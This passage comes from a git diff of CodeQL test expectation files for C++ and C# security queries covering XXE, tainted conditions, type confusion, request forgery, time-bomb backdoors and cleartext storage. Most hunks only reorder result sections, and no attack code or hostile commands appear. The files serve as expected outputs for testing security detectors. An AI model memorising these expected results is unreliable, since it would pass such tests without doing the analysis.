tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | -| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | -| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | -| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | -| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | -| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | -| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | -| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | -| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | edges | tests2.cpp:20:17:20:31 | *new | tests2.cpp:22:2:22:2 | *p | provenance | | | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:20:17:20:31 | *new | provenance | | @@ -216,3 +185,34 @@ nodes | tests.cpp:128:18:128:18 | *q | semmle.label | *q | subpaths | tests.cpp:126:18:126:18 | *q | tests.cpp:112:39:112:39 | *p | tests.cpp:112:39:112:39 | *p | tests.cpp:126:18:126:18 | test10_doParseB output argument | +#select +| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | +| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | +| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | +| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | +| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | +| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | +| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | +| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | +| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | +| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | +| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | +| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | +| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | +| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | +| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | +| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | +| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | +| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | +| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | +| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | +| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | +| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | +| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | +| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | +| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | +| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected index 5a1e5dbcbc5b..fc3a964b2bf3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-807/semmle/TaintedCondition/TaintedCondition.expected @@ -1,5 +1,3 @@ -#select -| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | edges | test.cpp:20:29:20:47 | *call to getenv | test.cpp:20:29:20:47 | *call to getenv | provenance | | | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | provenance | TaintFunction | @@ -8,3 +6,5 @@ nodes | test.cpp:20:29:20:47 | *call to getenv | semmle.label | *call to getenv | | test.cpp:24:10:24:35 | ! ... | semmle.label | ! ... | subpaths +#select +| test.cpp:24:10:24:35 | ! ... | test.cpp:20:29:20:47 | *call to getenv | test.cpp:24:10:24:35 | ! ... | Reliance on $@ to raise privilege at $@. | test.cpp:20:29:20:47 | *call to getenv | an environment variable | test.cpp:25:9:25:27 | ... = ... | ... = ... | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected index a805d06e1e22..6e18306bcd29 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-843/TypeConfusion.expected @@ -1,13 +1,3 @@ -#select -| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | -| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | -| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | -| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | -| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | -| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | -| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | -| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | -| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | edges | test.cpp:17:13:17:18 | new | test.cpp:17:13:17:18 | new | provenance | | | test.cpp:17:13:17:18 | new | test.cpp:18:21:18:47 | p | provenance | | @@ -114,3 +104,13 @@ nodes | test.cpp:226:13:226:18 | new | semmle.label | new | | test.cpp:227:29:227:63 | p | semmle.label | p | subpaths +#select +| test.cpp:28:25:28:55 | p | test.cpp:27:13:27:18 | new | test.cpp:28:25:28:55 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | +| test.cpp:33:12:33:30 | p | test.cpp:32:13:32:30 | new | test.cpp:33:12:33:30 | p | Conversion from $@ to $@ is invalid. | test.cpp:11:8:11:21 | Not_S1_wrapper | Not_S1_wrapper | test.cpp:1:8:1:9 | S1 | S1 | +| test.cpp:67:12:67:31 | a | test.cpp:66:15:66:21 | new | test.cpp:67:12:67:31 | a | Conversion from $@ to $@ is invalid. | test.cpp:55:8:55:10 | Cat | Cat | test.cpp:60:8:60:10 | Dog | Dog | +| test.cpp:128:24:128:59 | s2 | test.cpp:127:12:127:17 | new | test.cpp:128:24:128:59 | s2 | Conversion from $@ to $@ is invalid. | test.cpp:102:8:102:9 | S2 | S2 | test.cpp:119:8:119:20 | Not_S2_prefix | Not_S2_prefix | +| test.cpp:145:28:145:68 | s1_2 | test.cpp:143:14:143:19 | new | test.cpp:145:28:145:68 | s1_2 | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:131:8:131:23 | HasSomeBitFields | HasSomeBitFields | +| test.cpp:159:14:159:33 | a | test.cpp:153:9:153:15 | new | test.cpp:159:14:159:33 | a | Conversion from $@ to $@ is invalid. | test.cpp:60:8:60:10 | Dog | Dog | test.cpp:55:8:55:10 | Cat | Cat | +| test.cpp:189:25:189:45 | u64 | test.cpp:187:15:187:24 | new | test.cpp:189:25:189:45 | u64 | Conversion from $@ to $@ is invalid. | test.cpp:175:8:175:13 | UInt64 | UInt64 | test.cpp:184:8:184:22 | UInt8_with_more | UInt8_with_more | +| test.cpp:218:30:218:65 | p | test.cpp:217:13:217:18 | new | test.cpp:218:30:218:65 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:212:8:212:26 | UnrelatedStructSize | UnrelatedStructSize | +| test.cpp:227:29:227:63 | p | test.cpp:226:13:226:18 | new | test.cpp:227:29:227:63 | p | Conversion from $@ to $@ is invalid. | test.cpp:1:8:1:9 | S1 | S1 | test.cpp:221:8:221:25 | TooLargeBufferSize | TooLargeBufferSize | diff --git a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected index 54c478d94373..d0e8e0281f84 100644 --- a/csharp/ql/test/experimental/CWE-918/RequestForgery.expected +++ b/csharp/ql/test/experimental/CWE-918/RequestForgery.expected @@ -3,6 +3,6 @@ edges nodes | RequestForgery.cs:12:52:12:54 | url : String | semmle.label | url : String | | RequestForgery.cs:14:66:14:68 | access to parameter url | semmle.label | access to parameter url | +subpaths problems | RequestForgery.cs:14:66:14:68 | access to parameter url | RequestForgery.cs:12:52:12:54 | url : String | RequestForgery.cs:14:66:14:68 | access to parameter url | The URL of this request depends on a $@. | RequestForgery.cs:12:52:12:54 | url | user-provided value | -subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected index e5773327060f..95a491293ddb 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected @@ -1,3 +1,12 @@ +nodes +| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | +| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | +| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | +| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | +| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | +| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | +| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | +subpaths edges | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | test.cs:71:36:71:48 | access to local variable lastWriteTime | provenance | | | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | provenance | | @@ -8,16 +17,7 @@ edges | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo : Int32 | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:36:71:70 | call to method AddHours | provenance | | -nodes -| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | -| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | -| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | -| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | -| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | -| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | -| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | problems | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo : Int32 | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:76 | ... >= ... | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | -subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected index 010a2877589c..b8074b4fa636 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected @@ -1,4 +1,4 @@ edges nodes -problems subpaths +problems diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected index 60f88d172588..72846a3bea12 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected @@ -1,7 +1,3 @@ -#select -| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | -| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | -| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | edges | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | provenance | | | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | provenance | | @@ -16,3 +12,7 @@ nodes | Program.cs:26:39:26:42 | access to parameter year | semmle.label | access to parameter year | | Program.cs:33:18:33:29 | ... - ... : Int32 | semmle.label | ... - ... : Int32 | subpaths +#select +| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | +| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | +| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected index b7daaaf26e7f..74b546faa65f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-312/CleartextStorage.expected @@ -1,13 +1,3 @@ -#select -| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | -| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:17:69:17:81 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:18:50:18:63 | call to method GetAccountID | call to method GetAccountID | -| CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:26:21:26:33 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:34:26:34:38 | call to method GetPassword | call to method GetPassword | -| CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | CleartextStorage.cs:94:21:94:33 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:94:21:94:33 | access to property Text | access to property Text | -| CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | CleartextStorage.cs:95:21:95:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:95:21:95:29 | access to property Text | access to property Text | -| CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | CleartextStorage.cs:96:21:96:29 | access to property Text | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:96:21:96:29 | access to property Text | access to property Text | edges nodes | CleartextStorage.cs:15:50:15:59 | access to field accountKey | semmle.label | access to field accountKey | @@ -20,3 +10,13 @@ nodes | CleartextStorage.cs:95:21:95:29 | access to property Text | semmle.label | access to property Text | | CleartextStorage.cs:96:21:96:29 | access to property Text | semmle.label | access to property Text | subpaths +#select +| CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | CleartextStorage.cs:15:50:15:59 | access to field accountKey | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:15:50:15:59 | access to field accountKey | access to field accountKey | +| CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | This stores sensitive data returned by $@ as clear text. | CleartextStorage.cs:16:62:16:74 | call to method GetPassword | call to method GetPassword | +| CleartextStorage.cs:17:69:17:81 | call to method GetPassword | 